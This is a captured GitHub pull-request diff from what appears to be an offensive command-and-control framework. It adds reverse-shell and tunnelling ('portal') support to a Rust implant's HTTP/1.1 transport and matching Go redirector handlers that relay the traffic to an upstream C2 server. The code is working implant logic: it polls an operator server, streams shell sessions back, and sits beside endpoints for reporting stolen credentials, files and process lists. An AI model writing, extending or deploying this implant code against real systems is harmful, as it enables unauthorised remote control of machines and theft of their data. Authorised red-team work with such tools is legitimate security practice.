Skip to content
Closed
Show file tree
Hide file tree
Changes from 1 commit
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
107 changes: 96 additions & 11 deletions implants/lib/transport/src/http.rs
Original file line number Diff line number Diff line change
Expand Up @@ -89,7 +89,8 @@ static REPORT_CREDENTIAL_PATH: &str = "/c2.C2/ReportCredential";
static REPORT_FILE_PATH: &str = "/c2.C2/ReportFile";
static REPORT_PROCESS_LIST_PATH: &str = "/c2.C2/ReportProcessList";
static REPORT_OUTPUT_PATH: &str = "/c2.C2/ReportOutput";
static _REVERSE_SHELL_PATH: &str = "/c2.C2/ReverseShell";
static REVERSE_SHELL_PATH: &str = "/c2.C2/ReverseShell";
static CREATE_PORTAL_PATH: &str = "/c2.C2/CreatePortal";

// Marshal: Encode and encrypt a message using the ChachaCodec
// Uses the helper functions exported from pb::xchacha
Expand Down Expand Up @@ -166,6 +167,92 @@ impl std::fmt::Debug for HTTP {
}

impl HTTP {
async fn handle_short_poll_streaming<Req, Resp>(
&self,
mut rx: tokio::sync::mpsc::Receiver<Req>,
tx: tokio::sync::mpsc::Sender<Resp>,
path: &'static str,
) -> Result<()>
where
Req: Message + Send + 'static,
Resp: Message + Default + Send + 'static,
{
loop {
// Buffer to hold messages to send in this polling interval
let mut messages = Vec::new();

// Check if there's any outgoing message (blocks until one is available or channel closed)
match tokio::time::timeout(std::time::Duration::from_millis(50), rx.recv()).await {
Ok(Some(msg)) => {
messages.push(msg);

// Grab any other immediately available messages
while let Ok(msg) = rx.try_recv() {
messages.push(msg);
}
}
Ok(None) => {
// Channel closed, terminate streaming
break;
}
Err(_) => {
// Timeout (50ms elapsed, no message). Continue loop to send empty payload/ping
}
}

// Prepare the body with encoded gRPC frames
let mut request_body = BytesMut::new();
for msg in messages {
let request_bytes = match marshal_with_codec::<Req, Resp>(msg) {
Ok(bytes) => bytes,
Err(err) => {
#[cfg(debug_assertions)]
log::error!("Failed to marshal streaming message: {}", err);
continue;
}
};
let frame_header = grpc_frame::FrameHeader::new(request_bytes.len() as u32);
request_body.extend_from_slice(&frame_header.encode());
request_body.extend_from_slice(&request_bytes);
}

// Build and send the HTTP request
let uri = self.build_uri(path)?;
let req = self
.request_builder(uri)
.body(hyper_legacy::Body::from(request_body.freeze()))
.context("Failed to build HTTP request")?;

let response = match self.send_and_validate(req).await {
Ok(resp) => resp,
Err(err) => {
#[cfg(debug_assertions)]
log::error!("Failed to send short poll HTTP request: {}", err);
tokio::time::sleep(std::time::Duration::from_secs(1)).await;
continue;
}
};

// Stream and process response frames
let result = Self::stream_grpc_frames::<Req, Resp, _>(response, |response_msg| {
tx.blocking_send(response_msg).map_err(|err| {
anyhow::anyhow!("Failed to send response through channel: {}", err)
})
})
.await;

if let Err(err) = result {
#[cfg(debug_assertions)]
log::error!("Failed to process response frames: {}", err);
}

// Adding a small delay to prevent tight loop spinning if rx channel isn't busy
tokio::time::sleep(std::time::Duration::from_millis(500)).await;
}

Ok(())
}

/// Build URI from path
fn build_uri(&self, path: &str) -> Result<hyper_legacy::Uri> {
let url = format!("{}{}", self.base_url, path);
Expand Down Expand Up @@ -537,22 +624,20 @@ impl Transport for HTTP {

async fn reverse_shell(
&mut self,
_rx: tokio::sync::mpsc::Receiver<ReverseShellRequest>,
_tx: tokio::sync::mpsc::Sender<ReverseShellResponse>,
rx: tokio::sync::mpsc::Receiver<ReverseShellRequest>,
tx: tokio::sync::mpsc::Sender<ReverseShellResponse>,
) -> Result<()> {
Err(anyhow::anyhow!(
"http/1.1 transport does not support reverse shell"
))
self.handle_short_poll_streaming(rx, tx, REVERSE_SHELL_PATH)
.await
}

async fn create_portal(
&mut self,
_rx: tokio::sync::mpsc::Receiver<CreatePortalRequest>,
_tx: tokio::sync::mpsc::Sender<CreatePortalResponse>,
rx: tokio::sync::mpsc::Receiver<CreatePortalRequest>,
tx: tokio::sync::mpsc::Sender<CreatePortalResponse>,
) -> Result<()> {
Err(anyhow::anyhow!(
"http/1.1 transport does not support portal"
))
self.handle_short_poll_streaming(rx, tx, CREATE_PORTAL_PATH)
.await
}

fn get_type(&mut self) -> pb::c2::transport::Type {
Expand Down
18 changes: 18 additions & 0 deletions tavern/internal/redirectors/http1/grpc_stream.go
Original file line number Diff line number Diff line change
Expand Up @@ -31,6 +31,24 @@ var (
},
MethodPath: "/c2.C2/ReportFile",
}

reverseShellStream = streamConfig{
Desc: grpc.StreamDesc{
StreamName: "ReverseShell",
ServerStreams: true,
ClientStreams: true,
},
MethodPath: "/c2.C2/ReverseShell",
}

createPortalStream = streamConfig{
Desc: grpc.StreamDesc{
StreamName: "CreatePortal",
ServerStreams: true,
ClientStreams: true,
},
MethodPath: "/c2.C2/CreatePortal",
}
)

// createStream creates a gRPC stream with the given configuration
Expand Down
86 changes: 86 additions & 0 deletions tavern/internal/redirectors/http1/handlers.go
Original file line number Diff line number Diff line change
Expand Up @@ -94,6 +94,92 @@ func handleFetchAssetStreaming(w http.ResponseWriter, r *http.Request, conn *grp
slog.Debug("http1 redirector: FetchAsset streaming complete", "chunks", chunkCount, "total_bytes", totalBytes)
}

func handleShortPollStreaming(w http.ResponseWriter, r *http.Request, conn *grpc.ClientConn, cfg streamConfig) {
if !requirePOST(w, r) {
slog.Error("http1 redirector: incoming request rejected, method not allowed", "method", r.Method, "path", r.URL.Path, "source", r.RemoteAddr)
return
}

clientIP := getClientIP(r)
slog.Info("http1 redirector: request", "source", clientIP, "destination", cfg.MethodPath)
slog.Debug("http1 redirector: short poll streaming request", "method", cfg.MethodPath, "source", clientIP)

ctx, cancel := createRequestContext(unaryTimeout)
defer cancel()

// Parse incoming gRPC stream data
buffer, ok := readRequestBody(w, r)
if !ok {
slog.Error("http1 redirector: incoming request failed, could not read request body", "path", cfg.MethodPath, "source", clientIP)
return
}

stream, err := createStream(ctx, conn, cfg)
if err != nil {
slog.Error("http1 redirector: upstream request failed, could not create gRPC stream", "method", cfg.MethodPath, "error", err)
handleStreamError(w, "Failed to create gRPC stream", err)
return
}

// Send all messages extracted from buffer
for {
header, message, remaining, ok := extractFrame(buffer)
if !ok {
break
}

buffer = remaining
slog.Debug("http1 redirector: received short poll stream chunk", "compression", header.CompressionFlag, "length", header.MessageLength)

if err := stream.SendMsg(message); err != nil {
slog.Error("http1 redirector: upstream request failed, could not send gRPC message", "method", cfg.MethodPath, "error", err)
handleStreamError(w, "Failed to send gRPC message", err)
return
}
}

if err := stream.CloseSend(); err != nil {
slog.Error("http1 redirector: upstream request failed, could not close gRPC send", "method", cfg.MethodPath, "error", err)
handleStreamError(w, "Failed to close gRPC send", err)
return
}

setGRPCResponseHeaders(w)

// Collect any returned messages and pack them as a single response buffer
chunkCount := 0
totalBytes := 0
for {
var responseChunk []byte
err := stream.RecvMsg(&responseChunk)
if err == io.EOF {
break
}
if err != nil {
slog.Error("http1 redirector: upstream request failed, error receiving stream message", "method", cfg.MethodPath, "error", err)
return
}

chunkCount++
totalBytes += len(responseChunk)
slog.Debug("http1 redirector: received stream chunk", "chunk", chunkCount, "chunk_size", len(responseChunk))

// Write gRPC frame header
frameHeader := newFrameHeader(uint32(len(responseChunk)))
encodedHeader := frameHeader.Encode()
if _, err := w.Write(encodedHeader[:]); err != nil {
slog.Error("http1 redirector: incoming request failed, could not write frame header to client", "error", err)
return
}

if _, err := w.Write(responseChunk); err != nil {
slog.Error("http1 redirector: incoming request failed, could not write chunk to client", "error", err)
return
}
}
slog.Debug("http1 redirector: short poll streaming complete", "chunks", chunkCount, "total_bytes", totalBytes)
}

func handleReportFileStreaming(w http.ResponseWriter, r *http.Request, conn *grpc.ClientConn) {
if !requirePOST(w, r) {
slog.Error("http1 redirector: incoming request rejected, method not allowed", "method", r.Method, "path", r.URL.Path, "source", r.RemoteAddr)
Expand Down
6 changes: 6 additions & 0 deletions tavern/internal/redirectors/http1/redirector.go
Original file line number Diff line number Diff line change
Expand Up @@ -27,6 +27,12 @@ func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *gr
mux.HandleFunc("/c2.C2/ReportFile", func(w http.ResponseWriter, r *http.Request) {
handleReportFileStreaming(w, r, upstream)
})
mux.HandleFunc("/c2.C2/ReverseShell", func(w http.ResponseWriter, r *http.Request) {
handleShortPollStreaming(w, r, upstream, reverseShellStream)
})
mux.HandleFunc("/c2.C2/CreatePortal", func(w http.ResponseWriter, r *http.Request) {
handleShortPollStreaming(w, r, upstream, createPortalStream)
})
mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
handleHTTPRequest(w, r, upstream)
})
Expand Down
Loading